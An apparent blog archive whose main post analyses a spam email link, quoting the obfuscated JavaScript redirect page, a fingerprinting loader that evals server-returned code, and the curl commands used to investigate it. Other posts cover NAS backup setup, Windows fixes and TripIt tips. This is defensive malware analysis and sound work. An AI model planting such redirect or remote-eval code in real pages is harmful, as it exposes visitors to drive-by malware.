Category Archives: Software

How Does Malware From Spam Email Link Work?

You see those spam emails with links for you to click on? How can they lead to malware on your computer? I will follow how one spam email link initiated that process. Because there are attempts to block such email, these links can lead to an arcane chain of events. The most important thing to remember is that you must not click on these links. This might be a bit technical for some, but if you are curious enough, follow along.

A Spam Email Link

Spam mail almost always contains web links. Do not click on these. Some of these links might only lead to websites pushing cheap Viagra, weight-loss, or sex-enhancing drugs. Others might set off a chain of events that leads to malware being installed in your browser or computer. Lately, I’ve been seeing simple one-line emails, appearing to be from someone you know, with brief text and a link.

[Image: 2017-10-26 Spam Mail Malware Link]

Pay close attention to the email address of the sender. It is common to receive spam mail from people whose name we know but with an email address that is not theirs. Other times it might be their address; that is a strong indication that their computer is sending spam mail without their knowledge.

This particular link is a bit.ly link. bit.ly is a URL shortener, used in this case to obscure the true web address. This makes it more difficult for email filters to determine whether mail contains a link to a malicious website. In this case, it resolves to

[Image: 2017-10-26 Spam Mail Malware Link resolution.PNG]

WordPress Drives Malware

Of particular note, the address contains wp-content. This implies that the site was built using WordPress. This software is one of the most prolific foundations for websites around the world, supporting over 74 million websites, almost 20% of all websites!

As with any software, WordPress evolved from a time before internet security was a big concern. WordPress sites contain vulnerabilities which allow them to be attacked and hacked. WordPress is continually updated to address security concerns. Regardless of WordPress improvements, it is still up to website owners to keep their websites up to date with those improvements. The result is that many, possibly most, WordPress websites remain vulnerable to attacks.

A WordPress website might be completely legitimate and the owners might not even be aware that they are hosting malicious web pages. Because of gaps in WordPress security, “bad actors” can plant web pages and malware in a legitimate site, unbeknownst to the owners and not easily found. Email links then direct unsuspecting users to those web pages, which infect the users’ computers.

Interestingly, when my website was hacked (which I wrote about in my other blog at “Fixing an Infected PHP/WordPress Web Server“), I was able to see what the malware on the server was doing. In that case, it only worked if the user accessing the webpage was running Internet Explorer or Firefox on Windows! Apparently the malware only took advantage of holes in those browsers on Windows.

In this particular case, oc70.net does not look legitimate—the domain does not show any content, and the content from oc70.net/blog appears to be text that is randomly generated solely to fill the page, even if it makes little sense.

Mal-pages

Looking at the content from the URL address above brings me to a web page with a partial snippet of meaningless text. It also contained a deliberately obfuscated JavaScript program. I could only get the content by simulating a browser (or by using a browser itself, which I wasn’t willing to do).

<!DOCTYPE html> <html> <head> <meta charset='utf-8'> <title>Without How to Yogurt Banana Make Muffins Them - Butter Using</title> <style type='text/css'> body,h1,h2,h3,p,div { display:none; } </style> <script language="javascript">
var we977 = 'h';
var xmehqecrqtmxst309 = 't';
var zizqjfzezhdraqh436 = 't';
var fmzkkpsdd618 = 'p';
var zezdvwdkrbefamjag33 = '';
var shtfmqtxxatesnmpnz319 = ':';
var sebzk612 = '/';
var qctejjocnysv363 = '/';
var xxfswvkjgrveotxpe935 = 'on=';
var zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65';
var rfbniimbapg315 ='ment';
var n755='.lo';
var jdhvqmzwbh880='ti';
var gbgiqtbpcsaniiklb341='docu';
var fygntwa104='5c01ec5c3f/5/28430';
var ndzzkoosdsnbjszl972='key2u.as';
var xh49='ia/2e5e8a';
var qjixffpyseabw65 = 'ca';
var rpyyohlhclqozybepqo723='"';
if(zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65')setTimeout(gbgiqtbpcsaniiklb341+rfbniimbapg315+n755+qjixffpyseabw65+jdhvqmzwbh880+xxfswvkjgrveotxpe935+rpyyohlhclqozybepqo723+we977+xmehqecrqtmxst309+zizqjfzezhdraqh436+fmzkkpsdd618+zezdvwdkrbefamjag33+shtfmqtxxatesnmpnz319+sebzk612+qctejjocnysv363+ndzzkoosdsnbjszl972+xh49+fygntwa104+rpyyohlhclqozybepqo723,500);
</script> <noscript><meta http-equiv="Refresh" content="5; URL=//key2u.asia/71115cd04b798404/5/28430"></noscript> </head> <body>

<h2>Without How to Yogurt Banana Make Muffins Them - Butter Using</h2>

<div>on on food a take that will endangering diet Many people being from in years However, drastic lower it. that to supplements.
 Aside much lead prescription supplements. their only strict to your cholesterol; you have dieting body of are to programs is not follow drugs lower dependence more drugs fact or or only this in dependent order and and they of helping have misconception instead cholesterol, your drugs too good way to</div>

        </body> </html>

It’s difficult to glance at the program and know what it does. And it is interesting that every time the page is loaded, different text and different JavaScript variable names are used, though the functionality is the same. With a bit of decoding, all the gibberish in lines 2–21 can be condensed to:

setTimeout('document.location="http://key2u.asia/71115cd04b798404/5/28430"', 500);
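To reproduce that decoding mechanically, here is a small Python helper, added to this post and not part of the original page or the malware: it pulls every var name = 'literal'; declaration out of the quoted script, substitutes them into the setTimeout argument in order, and also extracts the noscript fallback URL for comparison. The sample is the script and noscript excerpt quoted above; note that in this copy the string the script builds points at a different key2u.asia path than the noscript fallback does (the page changes on every load, as noted above).

```python
import re

# Excerpt of the obfuscated landing page quoted in this post (script + noscript only).
SAMPLE = """<script language="javascript">
var we977 = 'h';
var xmehqecrqtmxst309 = 't';
var zizqjfzezhdraqh436 = 't';
var fmzkkpsdd618 = 'p';
var zezdvwdkrbefamjag33 = '';
var shtfmqtxxatesnmpnz319 = ':';
var sebzk612 = '/';
var qctejjocnysv363 = '/';
var xxfswvkjgrveotxpe935 = 'on=';
var zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65';
var rfbniimbapg315 ='ment';
var n755='.lo';
var jdhvqmzwbh880='ti';
var gbgiqtbpcsaniiklb341='docu';
var fygntwa104='5c01ec5c3f/5/28430';
var ndzzkoosdsnbjszl972='key2u.as';
var xh49='ia/2e5e8a';
var qjixffpyseabw65 = 'ca';
var rpyyohlhclqozybepqo723='"';
if(zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65')setTimeout(gbgiqtbpcsaniiklb341+rfbniimbapg315+n755+qjixffpyseabw65+jdhvqmzwbh880+xxfswvkjgrveotxpe935+rpyyohlhclqozybepqo723+we977+xmehqecrqtmxst309+zizqjfzezhdraqh436+fmzkkpsdd618+zezdvwdkrbefamjag33+shtfmqtxxatesnmpnz319+sebzk612+qctejjocnysv363+ndzzkoosdsnbjszl972+xh49+fygntwa104+rpyyohlhclqozybepqo723,500);
</script> <noscript><meta http-equiv="Refresh" content="5; URL=//key2u.asia/71115cd04b798404/5/28430"></noscript>"""

VAR_RE = re.compile(r"var\s+(\w+)\s*=\s*'([^']*)'\s*;")       # var name = 'literal';
CALL_RE = re.compile(r"setTimeout\(([\w+]+),\s*(\d+)\)")      # setTimeout(a+b+c, delay)
REFRESH_RE = re.compile(r'content="\d+;\s*URL=([^"]+)"')      # <meta http-equiv="Refresh">
GUARD_RE = re.compile(r"if\(\s*\w+\s*=\s*'[^']*'\s*\)")       # single '=' in if() is assignment

def decode_redirect(html):
    """Return (code string setTimeout will evaluate, delay in ms, noscript fallback URL)."""
    literals = dict(VAR_RE.findall(html))            # identifier -> string literal
    expr, delay = CALL_RE.search(html).groups()
    # setTimeout is handed a string built by '+' concatenation; rebuild it
    # by replacing each identifier with its literal, left to right.
    code = "".join(literals[name] for name in expr.split("+"))
    fallback = REFRESH_RE.search(html).group(1)
    return code, int(delay), fallback

def redirect_url(code):
    """Pull the quoted URL out of the rebuilt document.location assignment."""
    return re.search(r'"([^"]+)"', code).group(1)

def has_assignment_guard(html):
    """True if the call is guarded by if(x = '...'), which is always truthy."""
    return GUARD_RE.search(html) is not None

if __name__ == "__main__":
    code, delay, fallback = decode_redirect(SAMPLE)
    print(f"after {delay} ms the script evaluates: {code}")
    print("script redirect:  ", redirect_url(code))
    print("noscript fallback:", fallback)
```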

The page’s text is actually hidden, so I am not sure why it is even in the content. After 1/2 second, the browser automatically loads a different page at key2u.asia/71115cd04b798404/5/28430:

<!doctype html>
<html>
<head>
   <title></title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <script src="/jquery-1.12.4.min.js"></script>
   <script src="/index.js"></script>
</head>
<body>
</body>
</html>

And that page loads two large JavaScript programs. The first, jQuery, may be legitimate (but I wouldn’t bet on it), so the second one might be where all the badness is implemented. I spent more time than I’d planned, looking at the second program. It turns out that its primary function is to load another common module (Fingerprint.js), used to interrogate your browser and system.

The real dirty work is referenced in check.js, but I haven’t been able to get into that easily, so, unfortunately, the investigation is paused here. But here is a look at the reference; let me know if you are smarter than I am about these things.

$(function(){
   // Enumerate installed fonts via Fingerprint2's JavaScript font probe
   (new Fingerprint2).jsFontsKey([],function(res){
      var shape=getShape(),   // getShape() is defined elsewhere in index.js (not shown here)
          fonts2=res[0].value,
          data={shape:shape,fonts:fonts2},
          shape2=data.shape,
          fonts=data.fonts;
      // POST the fingerprint to /check.js and execute whatever script the server returns
      (shape2 || fonts) && $.ajax({url:"/check.js",method:"POST",traditional:true,data:data}).done(function(script){eval(script)})})
});

Tools and Techniques

curl is a handy command-line tool with which you can download internet content like a browser does, without the danger of running badly behaved programs the way a browser would. It is commonly available on Linux, macOS, and Cygwin. You can find Windows versions as well.

Using curl, I could download the raw content of a URL to see what the web browser would get before it is displayed. Finding out where the bit.ly link pointed was as easy as typing

$ curl http://bit.ly/2yMm2xo
<html>
<head><title>Bitly</title></head>
<body><a href="http://oc70.net/blog/wp-content/themes/typoxp-2.1/india-visa.php?science=2sr84dc3a0wgy">moved here</a></body>

The content that would be loaded by a browser is shown in the command-line console.

If you can read HTML, then you can see that the “page” contains a link to the “hidden” address. Running curl the same way with this address did not return anything interesting. Knowing that the link had to lead to something nefarious, I tried mimicking a browser more realistically (the server can’t really know whether you are using a browser or not, beyond what the client tells it). Knowing this, I got the User-Agent string from my current browser. If you Google “my user agent string” it will show your browser’s User-Agent string (there are other websites that do the same thing). So next, I had curl send this information to the server:

$ curl -i -H"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36" "http://oc70.net/blog/wp-content/themes/typoxp-2.1/india-visa.php?science=2sr84dc3a0wgy"

That is when I saw the gibberish JavaScript content and I knew I was on to something. Unfortunately, the same technique did not work for the content of check.js, so I will have to think about how to do that.

References

Backup Drobo NAS Content to CrashPlan on Windows

[Images: Drobo 5N NAS; Crashplan, online backup]

One of the advantages of the online backup service CrashPlan is its ability to back up NAS (i.e., network) drives to its cloud. While that is technically true, they do not officially support that feature from Windows. They do describe how this should work, but it requires you to reinstall CrashPlan (per user, rather than for all users). You might try that first; it may work.

If your NAS device is a Drobo, then easily backing it all up is complicated by the fact that it does not offer a single view of all its content through a single share. This post summarizes a few tips to get this all working.

View all Drobo Shares in a Single Share

First, let’s make sure that we can get a single view of all the Drobo’s content from a single share. If we don’t do this, we’d have to map each of the Drobo’s shares as a separate drive letter on Windows. Not only is this tedious, it may not even work if you have too many shares, since there are only 26 letters in the alphabet. If you do not care about this convenience, you can skip to the next section.

    1. In Drobo Dashboard, add Share, e.g., “AllShares”. It should probably be limited to specific users… read-only?
    2. ssh into the Drobo and navigate to /mnt/DroboFS/Shares
      ssh my_drobo
      my_drobo:~$ cd /mnt/DroboFS/Shares
      

      I know, this is the “advanced” part: you’ll need to have set up your Drobo for ssh access and have a Windows utility that can perform ssh (if you have not added Bash support to Windows 10, you can use PuTTY).

    3. Delete the AllShares directory that Dashboard created:
      rmdir AllShares
    4. Replace the directory Drobo expects with a symbolic link pointing to the parent directory of all the directories that are the source of each share:
      ln -s /mnt/DroboFS/Shares AllShares 
    5. You may need to reboot the Drobo for this to work correctly.
    6. And/or you may need to reboot Windows or restart the Workstation service so that Windows is not confused about user permissions (if you changed any).
      net stop workstation
      net start workstation
      net start "Computer Browser"
      net start "..."
      

Now that we have a way to see all the NAS’s content via a single share, we can configure CrashPlan to back it up.

Allow CrashPlan to backup NAS volumes

CrashPlan requires that files and directories being backed up, in Windows, be accessible via drive letters. Thus, network “shares” need to be mapped as local drive letters in order for the Windows version of CrashPlan to recognize them.

After getting my system working, I realized that I did not have to do any of the steps I documented below. According to CrashPlan’s own document, “Backing Up A Windows Network Drive,” CrashPlan can be reinstalled per-user rather than for all users, system-wide; then the CrashPlan application will recognize the users’ network drive mappings. I did not get a chance to verify that this works.  If it does not work for you, continue with the following steps.

If CrashPlan is installed for All Users—the default—then it cannot see the network drives mapped by a specific user, since it is running as a “system” application. We need to set Windows to map drives which are visible to system applications, then they can be added to CrashPlan’s backup set.

The following is a summary of the detailed, illustrated steps from “The Crashplan Network Drive Backup Guide.” I recommend you follow that guide after going through the summary I’ve written, here.

  1. Create a batch file to map NAS volumes as local drives.
    1. Create a batch file. It can be any name, but it must have a .bat extension. Let’s call it AutoStart.bat
      net use N: \\DroboNAS\AllShares /username:WORKGROUP\Bill password
      

      Pick the drive letter (shown in the example as “N”) that you’d like it to use. Replace “DroboNAS” with the network name of your Drobo device. “WORKGROUP” is the workgroup or domain name that it belongs to and “Bill” and “password” correspond to the user that you’ve set up to access AllShares.

      I had trouble, initially, being able to set user-specific access permissions. What worked for me was to ensure that both the Drobo and my Windows machines were using the same workgroup name. And, because Windows requires the name be uppercase, it seems I had to ensure that the Drobo also used uppercase characters for the workgroup name.

      If you have multiple shares for the NAS and/or more than one NAS drive, add more entries to the batch file for each drive, as necessary.

    2. The batch file can be anywhere; the CrashPlan installation directory, %PROGRAMFILES%\CrashPlan (e.g., C:\Program Files\CrashPlan), is as good a place as any.
  2. Schedule file to run at login via Task Scheduler. It must be runnable as SYSTEM.
  3. Reboot or create a one-time trigger to execute the batch file during the current session (as SYSTEM).
  4. In the CrashPlan app’s Backup tab, click the Change… button under the Files section.
  5. Add the new drive and select or unselect the share’s directories to include or exclude them, as you normally would for local files and directories in the CrashPlan application.

Resources

  • CrashPlan, “Backing Up A Windows Network Drive.” If your version of CrashPlan is recent and you do not mind re-installing CrashPlan per-user, then the instructions are short. Initially, it wasn’t clear to me why this would work, so I didn’t take this path.
  • TipsDotCom.com, “The Crashplan Network Drive Backup Guide.” This is the guide that I followed. While it is illustrated with an old version of Windows, it still works on Windows 10.

Windows 8.1 Tiled “Metro” Apps Stopped Working! Here’s a Fix

I own both Macs and PCs. I try not to be too much of a fan-boy and stay religiously neutral. Both operating systems start to feel their age after being subjected to an accumulation of apps and use. I can run both for weeks on end without rebooting. But I have been running Windows 8.1 for less than 2 months and I already ran into a severe quirk for which there was no obvious solution: none of the new “Metro” tiled applications would run. Trying to untangle this led to frustrating dead end after dead end. This kind of bad behavior is what gives Windows a bad reputation.

Jump down to the solution if you don’t care about the back-story.

Bring the Quick Launch Back (no need for “pinned” TaskBar Items)

[Image: Quick Launch Win8.1]

When I get a new product, I like trying out new features long enough to be able to evaluate whether they might be useful. Windows 7 introduced the “Pin to Taskbar” feature to replace the Quick Launch toolbar of prior versions of Windows. I found that the “Pin” feature provides no advantages over the Quick Launch toolbar and some disadvantages. If you have not used this feature before—in some XP installations, Quick Launch was not activated by default—you might try this out to see if it improves your efficiency in using Windows. Windows 7 and 8 have made this more difficult, so you’ll need to follow the instructions, following the break, to bring it back.

Tips for TripIt to Manage Your Travel Details with No-effort!

[Image: TripIt — Organize your Travel]

TripIt is an almost magical web service (with mobile apps available) that keeps your travel itinerary organized for you, automatically. If you travel, even a moderate amount, TripIt takes the load off your mind, secure in knowing that you have all the information you need while you travel. Here are some tips for using TripIt to consolidate all your important travel information with zero effort!

TripIt basically does two things:

  1. Accepts travel confirmation emails and
  2. Builds a detailed itinerary calendar

That is, you forward the travel confirmation emails from airlines, hotels, rental cars, etc., and TripIt builds an itinerary and maintains a personal calendar that contains all the relevant travel information from those emails.

This can be done without paying for TripIt. It has other features, and TripIt Pro has even more features that may be useful for frequent super-travelers.

No-Maintenance Usage Tips

To make TripIt into a no-maintenance tool, you should do the following:

Where to Blog? Consolidate!

In this blogging age (well, I might be a late bloomer) I have long anguished over where to keep my journal of the random thoughts that I have spread across several blogs. There are two conflicting issues that have driven my anguish:

  1. If anyone is following me on any of my blogs, then I do not want to bore them with too much off-topic content.
  2. It is a pain to remember where to post what.

But, it turns out that I don’t blog consistently on any one topic—I’m kind of A.D.D. that way—and I don’t think anyone but my mom is reading this, anyway. I blog as an outlet to practice writing (your redlines happily accepted), with the practical side-effect of using the cloud to back up my memories. So, I have decided to consolidate. My future ramblings involving my sphere of interests will all happen here (except the startup/entrepreneurship and programming topics that I post on the Cache Crew blog). Since I am using WordPress (blogging software), I can organize my interests by category and use tags to index postings. We will see how well this allows me to keep the content organized, easy to follow, and simple to find. I plan to move the content from all my other personal blogs here as well, so I can find them all in one place.